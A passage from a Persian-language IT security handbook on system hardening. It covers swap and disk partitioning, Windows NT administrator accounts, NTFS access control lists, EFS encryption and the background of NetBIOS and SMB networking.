‫ﺣﺎﻓﻈﻪﺍﻱ ﺑﻴﺸﺘﺮ ﺍﺯ ‪ RAM‬ﻣﻮﺟﻮﺩ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ ،‬ﻓﻀﺎﻳﻲ ﺍﺯ ﺩﻳﺴﻚ ﻛﻪ ﺑﻪ ‪ swap‬ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷـﻮﺩ‪ .‬ﻣﺮﺍﻗـﺐ‬
‫ﺑﺎﺷﻴﺪ ﻛﻪ ﺭﻭﻱ ‪partition‬ﻫﺎﻱ ﺩﻳﺴﻚ ﺧﻮﺩ ﻓﻀﺎﻱ ‪ swap‬ﻛﺎﻓﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪) .‬ﺑﺮﺧـﻲ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺭﻭﻱ ﻓﺎﻳﻠﻬـﺎﻳﻲ ﺩﺭ‬
‫‪partition‬ﻫﺎﻱ ﺑﺎ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻧﻴﺰ ‪ swap‬ﻛﻨﻨﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﻛﺎﺭﺍﻳﻲ ﭘﺎﻳﻴﻦ ﻣﻲﺁﻳﺪ‪(.‬‬

‫ﺩﻳﺴﻜﻬﺎ‬
‫‪ mail‬ﻳـﺎ‬ ‫ﻋﻼﻭﻩ ﺑﺮ ﺳﻴﺴﺘﻢ ‪partition ،quota‬ﻫﺎﻱ ﺣﻴﺎﺗﻲ ﺭﺍ ﺍﺯ ‪partition‬ﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﺎﺩﻓﹰﺎ ﻳﺎ ﻋﻤﺪﹰﺍ ﭘﺮ ﺷﻮﻧﺪ‬
‫)ﻣﺎﻧﻨﺪ ‪spool‬‬

‫‪partition‬ﻫﺎﻱ ﻣﺨﺼﻮﺹ ‪ upload‬ﻛﺮﺩﻥ ﻓﺎﻳﻞ( ﺟﺪﺍ ﺳﺎﺯﻳﺪ‪ .‬ﺩﻗﺖ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﻫﺮ ‪ ،partition‬ﻓﻀﺎ ﻭ ‪inode‬ﻫﺎﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﻓﺎﻳﻠﻬـﺎ‬
‫ﻣﻮﺟﻮﺩ ﺑﺎﺷﺪ‪ .‬ﺑﺮ ﻣﺼﺮﻑ ﺩﻳﺴﻚ ﻧﻈﺎﺭﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﻪ ﺑﺎﻳﮕﺎﻧﻲ ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎﻱ ﻗﺪﻳﻤﻲ ﺩﺭ ﺩﻳـﺴﮑﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﻭ ﻧـﻮﺭﻱ ﻭ‬
‫ﺣﺬﻑ ﺁﻧﻬﺎ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﮏ ﺳﺨﺖ ﺗﺸﻮﻳﻖ ﻛﻨﻴﺪ‪.‬‬

‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺎ ﺗﺄﻛﻴﺪ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻧﻔﺮﺍﺩﻱ ﻭ ﺑﺪﻭﻥ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﺷﺒﻜﻪ ﺁﻏﺎﺯ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﻣﺪﺕ ﻛﻮﺗـﺎﻫﻲ‬
‫)ﺍﺑﺘﺪﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ﻭ ﺳﭙﺲ ﺑﺎ ‪ (TCP/IP‬ﺑﺼﻮﺭﺕ ﺷﺒﻜﻪ ﻧﻴﺰ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﺪﻧﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ‪ Windows 3.x‬ﻭ‬
‫‪ Windows 95/98/ME‬ﻋﻤﻮﻣﹰﺎ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ؛ ﺑـﺮ ﺧـﻼﻑ ﺁﻥ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪) Windows NT‬ﺍﺯ ﺟﻤﻠﻪ ‪ Windows 2000‬ﻭ ‪ (Windows XP‬ﻏﺎﻟﺒﹰﺎ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻛﻨﺘﺮﻟﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺑﺴﻴﺎﺭ ﭘﻴﺸﺮﻓﺘﻪﺗﺮﻱ ﺩﺍﺭﻧﺪ‪ ٣٥٣.‬ﺗﻔﺎﻭﺗﻬﺎﻱ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ‪ Windows‬ﻣﻲﺗﻮﺍﻧﺪ ﻓﺎﺟﻌﻪﺁﻣﻴﺰ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺩﺭ ﻣﺤﻴﻄﻲ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﺯ‬
‫ﭼﻨﺪ ﻧﮕﺎﺭﺵ ﻣﺨﺘﻠﻒ ‪ Windows‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻫﺮ ﻧﺴﺨﻪ ﺗﻮﺟﻬﺎﺕ ﻭ ﺗﺪﺍﺑﻴﺮ ﺧـﺎﺹ ﺧـﻮﺩﺵ ﺭﺍ ﻻﺯﻡ ﺩﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﻗـﺴﻤﺖ ﻛﺘـﺎﺏ ﺩﺭ‬
‫ﺩﺭﺟﺔ ﺍﻭﻝ ﺑﺮ ﻣﺴﺘﺤﻜﻢ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows NT‬ﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ‪.‬‬
‫ﻫﻤﺎﻧﻨﺪ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ‪ ،‬ﻫﻴﭻ ﭼﻴﺰ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺧﻮﺍﻧﺪﻥ ﻛﺘﺎﺑﭽﺔ ﺭﺍﻫﻨﻤﺎ ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﺷﻤﺎ ﺑﺎ ‪ Windows‬ﻣﻔﻴﺪ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﺳﺎﻳﺮ ﻛﺘﺎﺑﻬـﺎ‪،‬‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ‪ ،‬ﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻣﺨﺼﻮﺹ ﺍﻣﻨﻴﺖ ‪ Windows‬ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻄﺎﻟﺐ ﻏﻨﻲ ﻭ ﻓﺮﺍﻭﺍﻧـﻲ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪.‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺷﺎﻣﻞ ﻳﻚ ﺑﺨﺶ ﺑﺰﺭﮒ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺍﺳﺖ ﻛﻪ ﺩﺍﺭﺍﻱ ﻣﺴﺘﻨﺪﺍﺕ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻔﻴﺪ ﺯﻳﺎﺩﻱ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ‬

‫‪ ۳۵۳‬ﺑﺮ ﺧﻼﻑ ﺍﻧﺘﻈﺎﺭ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ DOS‬ﻧﻴﺰ ﺩﺭ ﺑﻌﻀﻲ ﺷﺮﺍﻳﻂ ﺑﺮﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﮔﺰﻳﻨﺔ ﻣﻨﺎﺳﺒﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻫﺴﺘﻨﺪ ﻭ ﻧﻘﺎﻁ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻧﺪﻛﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﻚﻣﻨﻈﻮﺭﺓ ﺛﺒﺖ‪ ،‬ﭘﺎﻳﺎﻧﻪ‪ ،‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪ ،‬ﻭ ﺣﺘﻲ ‪ DNS‬ﮔﺰﻳﻨﺔ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳـﺒﻲ‬
‫ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٤٨‬‬

‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺤﻠﻴﻠﮕﺮ ﭘﺎﻳﻪﺍﻱ ﺍﻣﻨﻴﺖ‪ ٣٥٤‬ﻛﻪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ Windows NT‬ﺭﺍ ﺗﺤﻠﻴـﻞ ﻣـﻲﻛﻨـﺪ ﻭ‬
‫ﺗﻮﺻﻴﻪﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻘﻮﻳﺖ ﺁﻥ ﻣﻲﺩﻫﺪ‪ .‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺍﺟﺮﺍ ﻛﻨﻴﺪ‪.‬‬

‫ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﮔﺮﻭﻫﻬﺎ‪ ،‬ﻭ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ‬


‫‪ Windows‬ﻫﻢ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﮔﺮﻭﻫﻬﺎ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﺠﻮﺯﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﮔﺮﻭﻫﻬﺎﻱ ﮐﺎﺭﺑﺮﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﺧـﻮﺩ ﺭﺍ‬
‫ﺗﻌﻴﻴﻦ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺟﺰﺋﻲﺗﺮﻱ ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﻣﻤﻜﻦ ﻣﻲﺑﺎﺷـﺪ‪ .‬ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺭﺍﻫﺒـﺮ ﺳﻴـﺴﺘﻢ ﺩﺭ ﮔـﺮﻭﻩ‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻋﻀﻮ ﺍﺳﺖ ﻭ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ‪ ،‬ﻭ ﻟﺬﺍ ﻫﺪﻑ ﺍﺻﻠﻲ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺳﻴﺴﺘﻢ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺁﻥ "‪ "administrator‬ﻣﻲﺑﺎﺷﺪ ﺑﻪ ﻃـﺮﻕ ﻣﺨﺘﻠﻔـﻲ ﻗﺎﺑـﻞ ﻣﺤﺎﻓﻈـﺖ‬
‫ﺍﺳﺖ‪ .‬ﺗﻐﻴﻴﺮ ﻧﺎﻡ ﺁﻥ ﺑﻪ ﻳﻚ ﻧﺎﻡ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﻓﻘﻴﺖ ﺣﻤﻼﺕ ﺧﻮﺩﻛﺎﺭ ﺭﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻛﻨـﺪ )ﻫﺮﭼﻨـﺪ ﺍﻣﻜـﺎﻥ ﺍﻓـﺸﺎﻱ ﻧـﺎﻡ ﺟﺪﻳـﺪ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ(؛‬
‫ﺳﺎﺧﺘﻦ ﻳﻚ ﺣﺴﺎﺏ ﻏﻴﺮﻓﻌﺎﻝ ﺩﺭﻭﻏﻴﻦ ﺑﻪ ﻧﺎﻡ ‪ administrator‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻛﺸﻒ ﺣﻤﻼﺗﻲ ﻛﻪ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﺍﻧﺠـﺎﻡ ﻣـﻲﺷـﻮﻧﺪ ﻛﻤـﻚ‬
‫ﻛﻨﺪ‪ .‬ﻭﺭﻭﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍﻫﺒﺮ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩ ﻭ ﻭﺭﻭﺩﻫﺎﻱ ﻣﺤﻠﻲ ﺭﺍ ﻧﻴﺰ ﻣﺤﺪﻭﺩ ﻧﻤﻮﺩ ﻭ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺩ‪.‬‬
‫ﺍﻳﻨﻜﻪ ﭼﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﺩﺭ ﭼﻪ ﮔﺮﻭﻫﻬﺎﻳﻲ ﻋﻀﻮ ﻫﺴﺘﻨﺪ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ‪ .‬ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻣـﺪﻳﺮﻳﺖ ﺭﺍﻳﺎﻧـﻪ‪ ٣٥٥‬ﻧﻤـﺎﻳﻲ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﮔﺮﻭﻫﻬـﺎﻱ‬
‫ﺗﻌﺮﻳﻒﺷﺪﻩ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻣﻲﮔﺬﺍﺭﺩ‪.‬‬

‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ‬


‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺩﻭ ﻧﻮﻉ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ :‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ VFAT ،FAT) FAT‬ﻭ ‪(FAT32‬‬
‫ﻛﻪ ﺑﺎ ﺗﻤﺎﻡ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺳﺎﺯﮔﺎﺭﻧﺪ‪ ،‬ﻭ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ‪ NTFS‬ﻛـﻪ ﺗﻨﻬـﺎ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪Windows NT‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻴﺎﻥ ﺗﻨﻬﺎ ‪ NTFS‬ﺍﺳﺖ ﻛﻪ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳـﻄﺢ ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ ﺩﺍﺭﺩ‪ .‬ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ‬
‫‪ FAT‬ﻫﻴﭻ ﺗﺪﺑﻴﺮﻱ ﺩﺭ ﺯﻣﻴﻨﺔ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻳﺎ ﻣﺎﻟﻜﻴﺖ ﻓﺎﻳﻠﻬﺎ ﻧﺪﺍﺭﺩ ﻭ ﻧﺒﺎﻳﺪ ﺍﺯ ﺁﻥ ﺩﺭ ﻫﻴﭻ ﺳﻴﺴﺘﻢ ﺣﺴﺎﺳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ NTFS‬ﺍﺯ ﻃﺮﻳﻖ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ )‪ACL‬ﻫـﺎ( ﻣـﺪﻳﺮﻳﺖ ﻣـﻲﺷـﻮﺩ‪ACL .‬ﻫـﺎ‬
‫ﻋﻤﻮﻣﹰﺎ ﺗﻌﻴﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﻣﺠﻮﺯﻫﺎﻳﻲ )ﺧﻮﺍﻧﺪﻥ‪ ،‬ﻧﻮﺷﺘﻦ‪ ،‬ﺍﺟﺮﺍ‪ ،‬ﺩﻳﺪﻥ ﻣﺤﺘﻮﻳﺎﺕ‪ ،‬ﺗﻐﻴﻴﺮ‪ ،‬ﻛﻨﺘﺮﻝ ﻛﺎﻣـﻞ‪ ،‬ﻭ ﻳـﺎ ﻣـﻮﺍﺭﺩ ﺩﻳﮕـﺮ( ﺑـﻪ ﭼـﻪ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﺍﺯ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﺮ ﺷﻲﺀ ﺩﺭﻭﻥ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ )ﻭ ﺩﺭﻭﻥ ‪ (windows registry‬ﻳﻚ ‪ ACL‬ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺩﺍﺭﺩ ﻭ ﻳﺎ ﺧﺼﻮﺻﻴﺎﺕ‬
‫‪ ACL‬ﺷﺎﺧﻪ ﺑﺎﻻﻳﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﺭﺙ ﻣﻲﺑﺮﺩ‪.‬‬
‫ﺳﻴﺴﺘﻢ ‪ ACL‬ﻳﻚ ﺍﺑﺰﺍﺭ ﺍﻣﻨﻴﺘﻲ ﻗﺪﺭﺗﻤﻨﺪ ﻭ ﭘﻴﭽﻴﺪﻩ ﺍﺳﺖ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﻣﻄﺎﻟﻌﺎﺕ ﺯﻳﺎﺩﻱ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﭼﻨـﺪ ﻗﺎﻟـﺐ ﺍﻣﻨﻴﺘـﻲ ﺍﺭﺍﺋـﻪ‬
‫ﻣﻲﺩﻫﺪ ﻛﻪ ﻫﺮﻛﺪﺍﻡ ﺑﺮﺍﻱ ﺷﺎﺧﻪﻫﺎﻱ ﺳﻴﺴﺘﻤﻲ ﻭ ﻛﻠﻴﺪﻫﺎﻱ ‪ACL ،registry‬ﻫﺎﻱ ﻣﻨﺎﺳﺐ ﺍﺭﺍﺋﻪ ﻣـﻲﺩﻫﻨـﺪ‪ ،‬ﻭﻟـﻲ ﺷـﻤﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﻣﺤﺪﻭﺩﻳﺖ ﺑﻴﺸﺘﺮﻱ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ‪.‬‬

‫ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫‪ Microsoft Windows‬ﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﺔ ﻳﻜﭙﺎﺭﭼﻪ ﺑﻪ ﻧﺎﻡ ‪ CryptoAPI‬ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺭﺍﺋﻪ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻢ ﻓﺎﻳـﻞ‬
‫‪ ،NTFS‬ﻓﺎﻳﻠﻬــﺎ ﻭ ﺷــﺎﺧﻪﻫــﺎ ﺭﺍ ﻣــﻲﺗــﻮﺍﻥ ﺑــﺎ ﺍﺑــﺰﺍﺭ ‪ cipher.exe‬ﺭﻣﺰﮔــﺬﺍﺭﻱ ﻛــﺮﺩ‪ ،‬ﻛــﻪ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﻓﺎﻳــﻞ ﺭﻣﺰﺷــﺪﺓ ﻧــﺎﻣﺮﺋﻲ‬
‫)‪ ٣٥٦(Transparent EFS‬ﺭﺍ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪ .‬ﻣﺒﻨﺎﻱ ‪ EFS‬ﺑﺮ ﭘﺎﻳﺔ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﻨﺎ ﻧﻬﺎﺩﻩ ﺷﺪﻩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑـﺎ‬
‫ﺍﺭﺍﺋﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻨﺎﺳﺐ‪ ،‬ﺑﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻣﺰﺷﺪﺓ ﺧﻮﺩ ﺩﺳﺖ ﻳﺎﺑﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻲﺗﻮﺍﻥ ‪ EFS‬ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﺮﺩ ﻛـﻪ ﺩﺭﺻـﻮﺭﺕ‬
‫ﮔﻢ ﺷﺪﻥ ﻛﻠﻴﺪ‪ ،‬ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺘﻮﺍﻧﺪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﺪ‪) .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻳﺎ ﻛـﺎﻫﺶ‬
‫ﺩﻫﺪ‪(.‬‬

‫‪354 Baseline Security Analyzer‬‬


‫‪355 Computer Management‬‬
‫‪356 Transparent Encrypted File System‬‬
‫‪٤٤٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺷﺒﻜﻪﻫﺎﻱ ‪TCP/IP‬‬

‫ﻗﺒﻞ ﺍﺯ ‪Windows 2000‬‬

‫‪ Microsoft Windows‬ﺗﺎ ﻗﺒﻞ ﺍﺯ ﺭﻭﺍﺝ ﮔﺴﺘﺮﺩﺓ ‪ TCP/IP‬ﺍﺯ ﻳﻚ ﻣﺪﻝ ﺷﺒﻜﻪﺍﻱ ‪ Ethernet‬ﻧﻈﻴﺮ ﺑﻪ ﻧﻈﻴﺮ‪ ٣٥٧‬ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛـﺮﺩ‬
‫)‪ NetBIOS‬ﺍﺯ ﻃﺮﻳﻖ ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ‪ .(NetBEUI‬ﺑﺎﻗﻴﻤﺎﻧﺪﺓ ‪ NetBIOS‬ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺧﺪﻣﺎﺕ ﭼﺎﭘﮕﺮﻱ ﻭ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﻳـﺪ‪،‬‬
‫ﻛﻪ ﺑﺼﻮﺭﺕ ‪ NetBIOS‬ﺍﺯ ﻃﺮﻳﻖ ‪) TCP/IP‬ﮔﺎﻩ ﻣﻌﺮﻭﻑ ﺑﻪ ‪ (NBT‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻪ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳﻠﻬـﺎ ﺑﻠـﻮﻙ ﭘﻴـﺎﻡ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ )‪ ٣٥٨(SMB‬ﻳﺎ ‪ CIFS‬ﻣﻲﮔﻮﻳﻨﺪ‪RFC .‬ﻫﺎﻱ ﺷـﻤﺎﺭﺓ ‪ ١٠٠١‬ﻭ ‪ ١٠٠٢‬ﺑﻄـﻮﺭ ﺩﻗﻴـﻖ ‪ NetBIOS‬ﺍﺯ ﻃﺮﻳـﻖ ‪ TCP/IP‬ﺭﺍ‬
‫ﺗﻮﺻﻴﻒ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬
